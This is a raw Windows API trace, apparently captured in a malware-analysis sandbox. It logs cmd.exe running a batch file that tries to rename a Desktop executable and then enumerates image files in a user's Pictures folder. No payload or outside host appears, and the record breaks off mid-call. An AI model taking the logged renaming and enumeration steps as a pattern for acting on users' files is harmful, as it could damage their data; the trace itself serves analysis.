0x21ed8c70000 [0293.179] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x150) returned 0x21ed8d6b2a0 [0293.179] GetProcessHeap () returned 0x21ed8c70000 [0293.179] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d6b2a0, Size=0xb2) returned 0x21ed937b9f0 [0293.179] GetProcessHeap () returned 0x21ed8c70000 [0293.179] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed937b9f0) returned 0xb2 [0293.179] GetProcessHeap () returned 0x21ed8c70000 [0293.179] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d2b7a0 [0293.180] GetProcessHeap () returned 0x21ed8c70000 [0293.180] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d2b7a0, Size=0x30) returned 0x21ed8d2b7a0 [0293.180] GetProcessHeap () returned 0x21ed8c70000 [0293.180] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d2b7a0) returned 0x30 [0293.180] GetProcessHeap () returned 0x21ed8c70000 [0293.180] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d2b7e0 [0293.180] malloc (_Size=0x1ff9c) returned 0x21ed985fac0 [0293.180] GetProcessHeap () returned 0x21ed8c70000 [0293.180] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed937c2f0 [0293.180] GetProcessHeap () returned 0x21ed8c70000 [0293.180] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xac) returned 0x21ed937c8f0 [0293.180] ??_V@YAXPEAX@Z () returned 0x1 [0293.180] malloc (_Size=0x1ff9c) returned 0x21ed985fac0 [0293.180] GetProcessHeap () returned 0x21ed8c70000 [0293.181] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed937b930 [0293.181] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", nBufferLength=0xffce, lpBuffer=0x21ed985fac0, lpFilePart=0xa6cf4fdd08 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFilePart=0xa6cf4fdd08*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe") returned 0x4d [0293.181] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x1bf8, cFileName="Users", cAlternateFileName="")) returned 0x21ed8cc7c60 [0293.181] FindClose (in: hFindFile=0x21ed8cc7c60 | out: hFindFile=0x21ed8cc7c60) returned 1 [0293.181] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x1bf8, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8cc78a0 [0293.181] FindClose (in: hFindFile=0x21ed8cc78a0 | out: hFindFile=0x21ed8cc78a0) returned 1 [0293.182] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd623d33f, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xd623d33f, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x1bf8, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8cc8200 [0293.182] FindClose (in: hFindFile=0x21ed8cc8200 | out: hFindFile=0x21ed8cc8200) returned 1 [0293.182] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd623d33f, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xd623d33f, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x1bf8, cFileName="Desktop", cAlternateFileName="")) returned 0xffffffffffffffff [0293.182] malloc (_Size=0x1ff9c) returned 0x21ed987fa70 [0293.182] ??_V@YAXPEAX@Z () returned 0x21ed987fa70 [0293.182] GetProcessHeap () returned 0x21ed8c70000 [0293.182] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x74) returned 0x21ed8d675b0 [0293.183] ??_V@YAXPEAX@Z () returned 0x1 [0293.183] ??_V@YAXPEAX@Z () returned 0x1 [0293.184] GetProcessHeap () returned 0x21ed8c70000 [0293.184] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d2b7e0, Size=0x490) returned 0x21ed8d2b7e0 [0293.184] GetProcessHeap () returned 0x21ed8c70000 [0293.184] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d2b7e0) returned 0x490 [0293.184] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fddc8 | out: _Buffer="\r\n") returned 2 [0293.184] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.184] GetFileType (hFile=0x50) returned 0x2 [0293.184] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.184] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd58 | out: lpMode=0xa6cf4fdd58) returned 1 [0293.184] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.184] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fdd98, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fdd98*=0x2) returned 1 [0293.190] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures") returned 0x18 [0293.190] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fddd8 | out: _Buffer="C:\\Users\\FD1HVy\\Pictures") returned 24 [0293.190] _vsnwprintf (in: _Buffer=0x21ed8e80190, _BufferCount=0x83cd, _Format="%c", _ArgList=0xa6cf4fddd8 | out: _Buffer=">") returned 1 [0293.190] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.190] GetFileType (hFile=0x50) returned 0x2 [0293.190] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.191] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd88 | out: lpMode=0xa6cf4fdd88) returned 1 [0293.191] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.191] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0xa6cf4fddc8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fddc8*=0x19) returned 1 [0293.191] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.192] GetFileType (hFile=0x50) returned 0x2 [0293.192] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.192] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0293.192] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.192] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d2b7b0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x21ed8d2b7b0*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x3) returned 1 [0293.193] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe098 | out: _Buffer=" \"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister\" \"CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.bat\" ") returned 144 [0293.193] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.193] GetFileType (hFile=0x50) returned 0x2 [0293.193] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.193] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe028 | out: lpMode=0xa6cf4fe028) returned 1 [0293.193] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.193] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x90, lpNumberOfCharsWritten=0xa6cf4fe068, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe068*=0x90) returned 1 [0293.199] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe0c8 | out: _Buffer="\r\n") returned 2 [0293.200] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.200] GetFileType (hFile=0x50) returned 0x2 [0293.200] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.200] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0293.200] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.200] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x2) returned 1 [0293.205] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde10, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0293.206] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0293.206] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0293.206] malloc (_Size=0xffce) returned 0x21ed985fac0 [0293.206] ??_V@YAXPEAX@Z () returned 0x21ed985fac0 [0293.206] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0293.206] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0293.206] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0293.206] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0293.206] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0293.206] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0293.206] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0293.206] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0293.206] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0293.206] ??_V@YAXPEAX@Z () returned 0x1 [0293.206] GetProcessHeap () returned 0x21ed8c70000 [0293.206] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8d5e8e0 [0293.207] GetProcessHeap () returned 0x21ed8c70000 [0293.207] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d5e8e0, Size=0x130) returned 0x21ed8d57fa0 [0293.207] GetProcessHeap () returned 0x21ed8c70000 [0293.207] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d57fa0) returned 0x130 [0293.207] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0293.207] malloc (_Size=0xffce) returned 0x21ed985fac0 [0293.207] ??_V@YAXPEAX@Z () returned 0x21ed985fac0 [0293.207] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0293.207] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x21ed985fac0, nVolumeNameSize=0x7fe7, lpVolumeSerialNumber=0xa6cf4fd960, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xa6cf4fd960*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0293.211] ??_V@YAXPEAX@Z () returned 0x1 [0293.211] GetProcessHeap () returned 0x21ed8c70000 [0293.211] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x138) returned 0x21ed8d571e0 [0293.211] GetProcessHeap () returned 0x21ed8c70000 [0293.211] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8d5e420 [0293.211] GetProcessHeap () returned 0x21ed8c70000 [0293.211] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d5e420, Size=0x130) returned 0x21ed8d570a0 [0293.211] GetProcessHeap () returned 0x21ed8c70000 [0293.211] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d570a0) returned 0x130 [0293.211] malloc (_Size=0xffce) returned 0x21ed985fac0 [0293.211] ??_V@YAXPEAX@Z () returned 0x21ed985fac0 [0293.211] GetProcessHeap () returned 0x21ed8c70000 [0293.211] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8cc78a0 [0293.211] GetProcessHeap () returned 0x21ed8c70000 [0293.211] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d5b2b0 [0293.212] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0293.212] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0293.212] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0293.212] GetLastError () returned 0x2 [0293.212] GetProcessHeap () returned 0x21ed8c70000 [0293.212] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed9280080 [0293.212] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed9280090 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures") returned 0x18 [0293.212] SetErrorMode (uMode=0x0) returned 0x0 [0293.212] SetErrorMode (uMode=0x1) returned 0x0 [0293.212] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", nBufferLength=0x7fe7, lpBuffer=0x21ed985fac0, lpFilePart=0xa6cf4fd230 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", lpFilePart=0xa6cf4fd230*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister") returned 0x54 [0293.212] SetErrorMode (uMode=0x0) returned 0x1 [0293.213] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0293.213] GetProcessHeap () returned 0x21ed8c70000 [0293.213] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d5c3c0 [0293.213] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0293.213] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0293.213] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0293.213] GetLastError () returned 0x2 [0293.213] ??_V@YAXPEAX@Z () returned 0x1 [0293.213] malloc (_Size=0xffce) returned 0x21ed985fac0 [0293.213] ??_V@YAXPEAX@Z () returned 0x21ed985fac0 [0293.213] malloc (_Size=0xffce) returned 0x21ed986faa0 [0293.213] ??_V@YAXPEAX@Z () returned 0x21ed986faa0 [0293.213] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0293.214] GetLastError () returned 0x2 [0293.214] _get_osfhandle (_FileHandle=2) returned 0x54 [0293.214] GetFileType (hFile=0x54) returned 0x2 [0293.214] GetStdHandle (nStdHandle=0xfffffff4) returned 0x54 [0293.214] GetConsoleMode (in: hConsoleHandle=0x54, lpMode=0xa6cf4fd378 | out: lpMode=0xa6cf4fd378) returned 1 [0293.218] _get_osfhandle (_FileHandle=2) returned 0x54 [0293.218] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x54, lpConsoleScreenBufferInfo=0xa6cf4fd3b0 | out: lpConsoleScreenBufferInfo=0xa6cf4fd3b0) returned 1 [0293.219] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0293.219] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0xa6cf4fd450 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0293.219] WriteConsoleW (in: hConsoleOutput=0x54, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0xa6cf4fd3a0, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fd3a0*=0x2c) returned 1 [0293.226] longjmp () [0293.226] ??_V@YAXPEAX@Z () returned 0x1 [0293.226] FindNextFileW (in: hFindFile=0x21ed8c7d0c0, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32594d70, ftCreationTime.dwHighDateTime=0x1d5e6da, ftLastAccessTime.dwLowDateTime=0x26a4bbe0, ftLastAccessTime.dwHighDateTime=0x1d5e9aa, ftLastWriteTime.dwLowDateTime=0x26a4bbe0, ftLastWriteTime.dwHighDateTime=0x1d5e9aa, nFileSizeHigh=0x0, nFileSizeLow=0x1623, dwReserved0=0x0, dwReserved1=0xe68ac9ea, cFileName="Gq9O pR9E.bmp", cAlternateFileName="")) returned 1 [0293.226] GetProcessHeap () returned 0x21ed8c70000 [0293.226] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c72790, Size=0xf8) returned 0x21ed8c72790 [0293.227] GetProcessHeap () returned 0x21ed8c70000 [0293.227] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c72790) returned 0xf8 [0293.227] GetProcessHeap () returned 0x21ed8c70000 [0293.227] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d2bc80 [0293.227] GetProcessHeap () returned 0x21ed8c70000 [0293.227] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d2bc80, Size=0x30) returned 0x21ed8d2bc80 [0293.227] GetProcessHeap () returned 0x21ed8c70000 [0293.227] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d2bc80) returned 0x30 [0293.227] GetProcessHeap () returned 0x21ed8c70000 [0293.227] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d2bcc0 [0293.227] malloc (_Size=0x1ff9c) returned 0x21ed987fa80 [0293.228] GetProcessHeap () returned 0x21ed8c70000 [0293.228] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x2c) returned 0x21ed8cc89d0 [0293.228] ??_V@YAXPEAX@Z () returned 0x1 [0293.228] GetProcessHeap () returned 0x21ed8c70000 [0293.228] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d2bcc0, Size=0x150) returned 0x21ed8d2bcc0 [0293.228] GetProcessHeap () returned 0x21ed8c70000 [0293.228] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d2bcc0) returned 0x150 [0293.228] GetProcessHeap () returned 0x21ed8c70000 [0293.228] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d2be20 [0293.228] GetProcessHeap () returned 0x21ed8c70000 [0293.228] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d2be20, Size=0x290) returned 0x21ed8d2be20 [0293.228] GetProcessHeap () returned 0x21ed8c70000 [0293.228] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d2be20) returned 0x290 [0293.228] GetProcessHeap () returned 0x21ed8c70000 [0293.228] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d2c0c0 [0293.228] GetProcessHeap () returned 0x21ed8c70000 [0293.228] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d2c0c0, Size=0x30) returned 0x21ed8d2c0c0 [0293.228] GetProcessHeap () returned 0x21ed8c70000 [0293.228] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d2c0c0) returned 0x30 [0293.229] GetProcessHeap () returned 0x21ed8c70000 [0293.229] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d2c100 [0293.229] malloc (_Size=0x1ff9c) returned 0x21ed987fa80 [0293.230] GetProcessHeap () returned 0x21ed8c70000 [0293.230] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x2c) returned 0x21ed8cc87d0 [0293.230] ??_V@YAXPEAX@Z () returned 0x1 [0293.230] malloc (_Size=0x1ff9c) returned 0x21ed987fa80 [0293.230] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x7, cFileName="Users", cAlternateFileName="")) returned 0x21ed8cc76c0 [0293.230] FindClose (in: hFindFile=0x21ed8cc76c0 | out: hFindFile=0x21ed8cc76c0) returned 1 [0293.230] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x7, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8cc8080 [0293.231] FindClose (in: hFindFile=0x21ed8cc8080 | out: hFindFile=0x21ed8cc8080) returned 1 [0293.232] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd95a84df, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xd95a84df, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x7, cFileName="Pictures", cAlternateFileName="")) returned 0x21ed8cc7840 [0293.232] FindClose (in: hFindFile=0x21ed8cc7840 | out: hFindFile=0x21ed8cc7840) returned 1 [0293.232] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\Gq9O pR9E.bmp", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32594d70, ftCreationTime.dwHighDateTime=0x1d5e6da, ftLastAccessTime.dwLowDateTime=0x26a4bbe0, ftLastAccessTime.dwHighDateTime=0x1d5e9aa, ftLastWriteTime.dwLowDateTime=0x26a4bbe0, ftLastWriteTime.dwHighDateTime=0x1d5e9aa, nFileSizeHigh=0x0, nFileSizeLow=0x1623, dwReserved0=0x4, dwReserved1=0x7, cFileName="Gq9O pR9E.bmp", cAlternateFileName="GQ9OPR~1.BMP")) returned 0x21ed8cc7900 [0293.232] FindClose (in: hFindFile=0x21ed8cc7900 | out: hFindFile=0x21ed8cc7900) returned 1 [0293.232] _wcsnicmp (_String1="GQ9OPR~1.BMP", _String2="Gq9O pR9E.bmp", _MaxCount=0xd) returned 80 [0293.232] malloc (_Size=0x1ff9c) returned 0x21ed989fa30 [0293.233] ??_V@YAXPEAX@Z () returned 0x21ed989fa30 [0293.235] GetProcessHeap () returned 0x21ed8c70000 [0293.235] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x24) returned 0x21ed8d45da0 [0293.235] ??_V@YAXPEAX@Z () returned 0x1 [0293.235] ??_V@YAXPEAX@Z () returned 0x1 [0293.235] GetProcessHeap () returned 0x21ed8c70000 [0293.235] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d2c100, Size=0x150) returned 0x21ed8d2c100 [0293.235] GetProcessHeap () returned 0x21ed8c70000 [0293.235] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d2c100) returned 0x150 [0293.235] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0293.235] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.235] GetFileType (hFile=0x50) returned 0x2 [0293.235] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.235] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0293.236] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.236] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0293.242] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures") returned 0x18 [0293.243] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", 